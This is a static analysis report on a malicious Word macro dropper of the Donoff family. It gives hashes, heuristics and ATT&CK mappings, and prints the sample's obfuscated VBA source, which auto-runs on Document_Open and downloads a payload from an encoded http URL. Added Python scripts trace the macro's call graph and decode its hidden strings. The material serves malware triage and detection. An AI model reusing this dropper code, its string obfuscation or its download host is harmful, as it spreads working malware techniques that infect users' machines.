Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 935152b79d18fb4a…

MALICIOUS

Office (OLE)

Size: 144.0 KB
Created: 2016-06-02 02:12:00 (OLE document metadata; attacker-controlled, not a reliable build time)
Authoring application: Microsoft Office Word
First seen: 2017-12-09
MD5: 298799fc3c4c34366d2d223afcd1999d
SHA-1: b0e53fb6a4e90ad8fd37a1c46b84a5f8bad03538
SHA-256: 935152b79d18fb4a5f0dcdfa47422dfd2824680c812a12f5e91b9df7810f2616
Risk score: 242

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment
T1105 Ingress Tool Transfer

The sample carries VBA macros, including a Document_Open handler that Word runs automatically when the document is opened with macros enabled; this is the standard trigger for maldoc payloads, and the user still has to accept the macro warning, which is why such files arrive as spearphishing attachments. The CreateObject and CallByName calls are late binding: the COM ProgID and the member name are supplied as strings at run time, so neither the automation object nor the method invoked appears as a plain token in the source. The visible source is padded with junk procedures that are never called, uses random identifiers, and keeps its working strings encoded behind a decode helper in the hsVXQ module, all of which is intended to defeat signature and keyword scans. ClamAV detection as 'Doc.Dropper.Donoff-5743527-0' places the file in the Donoff dropper family, whose job is to fetch and execute a further payload (T1105) rather than carry it inside the document.

Heuristics 7

  • ClamAV: Doc.Dropper.Donoff-5743527-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
  • VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Auto-execution entry point: the Document_Open handler runs when the document is opened with macros enabled
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    Late-bound COM object creation from a ProgID string
  • CallByName call [high] OLE_VBA_CALLBYNAME
    Member invocation by name string, which hides the method or property used from keyword scans
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only documents, and documents whose source extraction failed, where no visible source is available.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#  In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/  In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/  In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#  In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main  In document text (OLE body)
    All five are XML namespace identifiers (RDF, XMP and DrawingML) from embedded image metadata and drawing parts, not network indicators. The strings the macro uses at run time are kept encoded (hsVXQ.bzpbqAmPyUXm) and therefore do not surface in the document body.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 18950 bytes
SHA-256: 20a877faaf274bee75f536ac927c6842e987b74c22872480e1827a120f48abe2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function ociLuics(ByVal omJPwaxQR As Integer) As String
OzfRei
JPnBWcIgQj 8198
If UZPnPnFPrLoI(8828, "JYEGvE0wjdjmxWfy9yE7dm") Then
eWzPh
dlnOmnEIBFhxwo = 7276
btERufe 4905, "nMhNqzsRswjTTFzd0jQBO38KdE"
lrbsKjj
End If
TcSLblZzSoLUyp = "zkxcaXSDHvAMUvqxTfWDU1bpQFjQNTh"
ociLuics = "aaE3CEkKH9kc5ZjuSLb90ZE50O"
End Function
Private Function EEGcZR() As Integer
GGkzZL False
oaXTOYoUklv 2233, "iHUi8YonAsrRcRE1cxsO5Sh7"
TVFvoHTOWoUpew
EEGcZR = 5204
End Function
Private Function dAfdQEV() As String
If LVXvawRYWJtmm(9126) Then
BaCYJGQf = 8634
OQQFxPVDYaD
Else
fjBcFZ True
mJxMcBJB
mpcgIqO
End If
KvCOr = True
dAfdQEV = "sD9O5cyyxKT92gd4m5Rcn1r"
End Function
Private Sub Document_Open()
CCuJzInKYvArg.aiTDrqxt
End Sub
Private Function dbyWvzOcol(ByVal PqVDEpBctGfueX As String, ByVal rzFpMAbPxc As Integer) As Integer
qYgNriJMrWy 4374
ZyDEMBcf
dJvPePoYpjcLZ
If PCRuwyqt Then
bCWtCOgKaFrFq
Else
HSpCDNA = "eenDpTPA8iAMlTadOl5068G7"
qJtLaFia
baKxcwJPQaDYl
End If
dbyWvzOcol = 1337
End Function

Attribute VB_Name = "CCuJzInKYvArg"
Private Function bLhYb(ByVal OklhZJQig As Object, ByVal KlKaTxi As Boolean) As Object
Dim naZpX As Integer
htJHkJTALdi = False
Set bLhYb = OklhZJQig
End Function
Public Sub aiTDrqxt()
On Error GoTo cvwcRas
nCVsOzVAhm.PfXGOUi
eWTWgo = True
nCVsOzVAhm.VqIHwulCqpYd
XutCexae
Exit Sub
lZvUNA = 5724
cvwcRas:
End Sub
Private Sub XutCexae()
Dim QuHzOWFAaVc As String
Dim jMbgCzsXBhkava As Integer
eKKKPJVhEX = "31oPXTmmVh1dciUjq"
vieEKRZsAtemPS 5737, DVABmnHJaKqB.LlwoVGDXrs, YNUvZC
UpHNpaM = 6867
DVABmnHJaKqB.fGBAmHpbhlKet 6258, DVABmnHJaKqB.LlwoVGDXrs
End Sub
Public Function wjiclADfraxE(ByVal WVTVsJEAlHsixU As String) As Object
Dim mxFICXx As String
Dim sAYDGYZ As Boolean
JjImGmDKPxhqsI = "dtKbtUjz23LStt3LezCokzzO"
Set wjiclADfraxE = bLhYb(CreateObject(WVTVsJEAlHsixU), True)
End Function
Private Function pNZld(ByVal whfAYPgNZW As String) As Integer
If kKjxs(8404, "tJMGahoLDuMaAv862pRZ9") Then
zblPry = 7354
XnVqDQNHxbSV
gLHzh
lvQLYsdRMuvyUN
XGIWAcvPzpEQ = "tuTkxof7YDu36clnaRcioy2QiEeQlkE"
Else
kdiyNy
lKKMyKmNnbbwDU "Y9V6ijNxEK4f0MSK4L", 4897
kHWCzJXNDXBDz
End If
maaKB 4147, 3708, 9625
pNZld = 2465
End Function
Private Sub vieEKRZsAtemPS(ByVal fCJMswkExxA As Integer, ByVal qplcHkrCfjz As String, ByVal RhitmwaIRW As String)
Dim EmZlioleoY As Integer
Set ftODBG = FFiTeqb.FqPMngOGLm(RhitmwaIRW, 7913, True)
FFiTeqb.TURyMdz "NwnIqNpfcXaecRg9os0Lp", YQpwtTgiFPGmN, 3895, ftODBG
GyqWpBDJw = True
DVABmnHJaKqB.HUnQMCBsCVVy 6655, FdtHzf.rDoQHGtJbVUYyC(2621, ftODBG, "mmEcXGvrDUxlT31sEdL8bsMz5xNjUZInP", hsVXQ.bzpbqAmPyUXm("R3eUgs/po3n3UsCeUBgodgyc", "rUg9cC/3")), "RnYJdwhq2gT5lny4dIeHpl", qplcHkrCfjz
End Sub
Private Function YNUvZC() As String
YNUvZC = hsVXQ.bzpbqAmPyUXm("RhtXt5Gp:MM//GjncjRb5-jtrveGMnMdMsv.cGoMm5X/cRMatRXalvovgXv/oRf5fjGicvXeX1v2.RvdvaXt", "RvX5GjM")
End Function
Private Function YQpwtTgiFPGmN() As String
YQpwtTgiFPGmN = hsVXQ.bzpbqAmPyUXm("TCTanTh'tSG d:ojwGunl8uoa:8d: bhi18nSar1y1L f:SiLlLe", "L8G:TjS1uh")
End Function

Attribute VB_Name = "hsVXQ"
Private Sub ittYqVla()
UYxwRMS False, 4187, False
yFFKIMi 3928, True, 3091
End Sub
Public Function Kahdaa(ByVal SwXylFx As String, ByVal JpMKysNAYEfyV As Boolean, ByVal ZiNcZreu As String) As String
Dim FIhOMZxAXPMT As Boolean
Dim YNocZpmlvZGI As Integer
RIaFgPqnEgq = "kb2OSuNBIdxBBkUdIlMEuy"
Kahdaa = SwXylFx & ZiNcZreu
End Function
Private Sub melxHETHqYwxv()
FrGRbLaNaXgHV 3835, "DECzvpGWuXWlsUP04", 8764
CZbQGXxXgn 5484, 760, 7177
CCDFjnMSBw = 3182
NxhUZF
End Sub
Private Function AftNHk(ByVal bZCavdNg As String, ByVal XntBZzjzpiuh As String) As String
If Not cgftb.DqQtUUiJM("1ixk7kpAJB5kJw7gNf1T5MiNR", XntBZzjzpiuh, bZCavdNg, "BvFpGa8Kl2gNHi8Hfi") Then
AftNHk = XntBZ
... (truncated)
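Most procedures in the listing above are junk that nothing ever calls, so the useful question is which ones are reachable from the auto-execution entry point. The script below is an added example for this report, not tooling from the page, from oletools or from the sample: it parses a constructed excerpt of the macro source shown above (module and procedure names copied verbatim, junk bodies trimmed, the two long encoded literals shortened), marks every Sub/Function reachable from Document_Open, reports which execution-relevant tokens sit on a live path versus in dead code, and lists the modules referenced as Module.Proc that the truncated listing does not contain.

```python
"""Call-graph triage for junk-padded VBA: which procedures actually run from
an auto-execution entry point such as Document_Open?

Added example for this report; not tooling from the page, from oletools or
from the sample. MACRO_EXCERPT is a constructed excerpt of the macro source
listed above (names verbatim, junk bodies trimmed, encoded literals shortened).
"""
import re

MACRO_EXCERPT = r'''
Attribute VB_Name = "ThisDocument"
Private Function dAfdQEV() As String
dAfdQEV = "sD9O5cyyxKT92gd4m5Rcn1r"
End Function
Private Sub Document_Open()
CCuJzInKYvArg.aiTDrqxt
End Sub
Attribute VB_Name = "CCuJzInKYvArg"
Private Function bLhYb(ByVal OklhZJQig As Object, ByVal KlKaTxi As Boolean) As Object
Set bLhYb = OklhZJQig
End Function
Public Sub aiTDrqxt()
On Error GoTo cvwcRas
nCVsOzVAhm.PfXGOUi
nCVsOzVAhm.VqIHwulCqpYd
XutCexae
Exit Sub
cvwcRas:
End Sub
Private Sub XutCexae()
vieEKRZsAtemPS 5737, DVABmnHJaKqB.LlwoVGDXrs, YNUvZC
DVABmnHJaKqB.fGBAmHpbhlKet 6258, DVABmnHJaKqB.LlwoVGDXrs
End Sub
Public Function wjiclADfraxE(ByVal WVTVsJEAlHsixU As String) As Object
Set wjiclADfraxE = bLhYb(CreateObject(WVTVsJEAlHsixU), True)
End Function
Private Sub vieEKRZsAtemPS(ByVal fCJMswkExxA As Integer, ByVal qplcHkrCfjz As String, ByVal RhitmwaIRW As String)
Set ftODBG = FFiTeqb.FqPMngOGLm(RhitmwaIRW, 7913, True)
FFiTeqb.TURyMdz "NwnIqNpfcXaecRg9os0Lp", YQpwtTgiFPGmN, 3895, ftODBG
End Sub
Private Function YNUvZC() As String
YNUvZC = hsVXQ.bzpbqAmPyUXm("RhtXt5Gp:MM//", "RvX5GjM")
End Function
Private Function YQpwtTgiFPGmN() As String
YQpwtTgiFPGmN = hsVXQ.bzpbqAmPyUXm("TCTanTh'tSG", "L8G:TjS1uh")
End Function
'''

# Procedure names Office runs on its own (a subset of olevba's AutoExec table).
AUTO_EXEC = {"document_open", "autoopen", "auto_open", "workbook_open",
             "document_close", "autoclose", "auto_close", "autoexec"}
# Tokens that turn a macro from "code" into "does something": object creation,
# late-bound calls, shells, HTTP, file writes.
EXEC_TOKENS = {"createobject", "getobject", "callbyname", "shell", "execute",
               "run", "send", "responsebody", "savetofile", "open"}

PROC_RE = re.compile(r'^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+([A-Za-z_]\w*)', re.I | re.M)
MODULE_RE = re.compile(r'^Attribute VB_Name = "([A-Za-z_]\w*)"', re.M)
IDENT_RE = re.compile(r'\b[A-Za-z_]\w*\b')
QUALIFIED_RE = re.compile(r'\b([A-Za-z_]\w*)\.([A-Za-z_]\w*)')


def strip_strings(src):
    """Blank out string literals so text inside them is not mistaken for identifiers."""
    return re.sub(r'"[^"\n]*"', '""', src)


def parse_procs(src):
    """Map each Sub/Function name to its body text (string literals removed)."""
    src = strip_strings(src)
    hits = list(PROC_RE.finditer(src))
    procs = {}
    for i, m in enumerate(hits):
        end = hits[i + 1].start() if i + 1 < len(hits) else len(src)
        procs[m.group(1)] = src[m.end():end]
    return procs


def call_graph(procs):
    """Edge a -> b whenever procedure a's body mentions procedure b by name."""
    graph = {}
    for a, body in procs.items():
        idents = set(IDENT_RE.findall(body))
        graph[a] = {b for b in procs if b != a and b in idents}
    return graph


def reachable(graph, start):
    seen, stack = set(), [start]
    while stack:
        node = stack.pop()
        if node not in seen:
            seen.add(node)
            stack.extend(graph.get(node, ()))
    return seen


def exec_tokens(procs, names):
    return {t for n in names for t in IDENT_RE.findall(procs[n]) if t.lower() in EXEC_TOKENS}


def unresolved_modules(src):
    """Modules referenced as Module.Proc but absent from the listing (truncated or not extracted)."""
    known = set(MODULE_RE.findall(src))
    return sorted({mod for mod, _ in QUALIFIED_RE.findall(strip_strings(src)) if mod not in known})


def triage(src):
    procs = parse_procs(src)
    graph = call_graph(procs)
    entries = [p for p in procs if p.lower() in AUTO_EXEC]
    live = set().union(*(reachable(graph, e) for e in entries)) if entries else set()
    dead = set(procs) - live
    return {
        "entry_points": entries,
        "live": sorted(live),
        "dead": sorted(dead),          # junk, or reached only through modules not in the listing
        "live_exec_tokens": sorted(exec_tokens(procs, live)),
        "dead_exec_tokens": sorted(exec_tokens(procs, dead)),
        "missing_modules": unresolved_modules(src),
    }


if __name__ == "__main__":
    for key, value in triage(MACRO_EXCERPT).items():
        print(f"{key}: {value}")
```

On this excerpt the live path is Document_Open to aiTDrqxt to XutCexae to vieEKRZsAtemPS, with YNUvZC and YQpwtTgiFPGmN supplying decoded strings; the one CreateObject in view sits in wjiclADfraxE, whose caller lives in a module outside the listing, which is exactly the gap the missing_modules field points at. Do not conclude "no execution primitive on the live path" from a partial source dump; the p-code heuristic above exists for that reason, and a full olevba run over the VBA project is the authoritative check.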
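The string obfuscation is a single helper, hsVXQ.bzpbqAmPyUXm(text, key), whose body lies in the part of the hsVXQ module cut off by the truncation. The decoder below is an added example, not code from the report or from the sample, and the transform it implements (drop every character of text that also occurs in key) is an inference: it is the simplest transform consistent with the arguments, and all three call sites visible in the listing decode to readable text under it, namely an http URL to a .dat file, the message Can't download binary file, and the property name ResponseBody, which fits late-bound access through CallByName on an HTTP response object. The three input lines are copied verbatim from the listing.

```python
"""Decoder for the hsVXQ.bzpbqAmPyUXm(text, key) string obfuscation seen in
this sample. Added example, not code from the report or the sample: the
helper's body is in the truncated hsVXQ module, so the transform below is an
inference, checked by the fact that every visible call site decodes to
readable text under it."""
import re

# The three call sites, copied verbatim from the macro listing.
MACRO_LINES = r'''
YNUvZC = hsVXQ.bzpbqAmPyUXm("RhtXt5Gp:MM//GjncjRb5-jtrveGMnMdMsv.cGoMm5X/cRMatRXalvovgXv/oRf5fjGicvXeX1v2.RvdvaXt", "RvX5GjM")
YQpwtTgiFPGmN = hsVXQ.bzpbqAmPyUXm("TCTanTh'tSG d:ojwGunl8uoa:8d: bhi18nSar1y1L f:SiLlLe", "L8G:TjS1uh")
DVABmnHJaKqB.HUnQMCBsCVVy 6655, FdtHzf.rDoQHGtJbVUYyC(2621, ftODBG, "mmEcXGvrDUxlT31sEdL8bsMz5xNjUZInP", hsVXQ.bzpbqAmPyUXm("R3eUgs/po3n3UsCeUBgodgyc", "rUg9cC/3")), "RnYJdwhq2gT5lny4dIeHpl", qplcHkrCfjz
'''

# Matches bzpbqAmPyUXm("<text>", "<key>") regardless of the surrounding expression.
CALL_RE = re.compile(r'bzpbqAmPyUXm\("([^"]*)",\s*"([^"]*)"\)')


def decode(text: str, key: str) -> str:
    """Inferred transform: the key is a set of filler characters sprinkled into
    the plaintext; removing every occurrence of them restores the original."""
    drop = set(key)
    return "".join(ch for ch in text if ch not in drop)


def decode_call_sites(src: str) -> list:
    """Pull every (text, key) pair out of VBA source and decode it, in source order."""
    return [decode(text, key) for text, key in CALL_RE.findall(src)]


if __name__ == "__main__":
    for plain in decode_call_sites(MACRO_LINES):
        print(plain)
```

The same regex can be pointed at the full macros.bas artifact to enumerate every encoded string at once; a filler-character scheme like this is only as strong as the analyst's unwillingness to try the obvious transform, so a decoded string that reads as English or as a URL is a reliable confirmation of the guess.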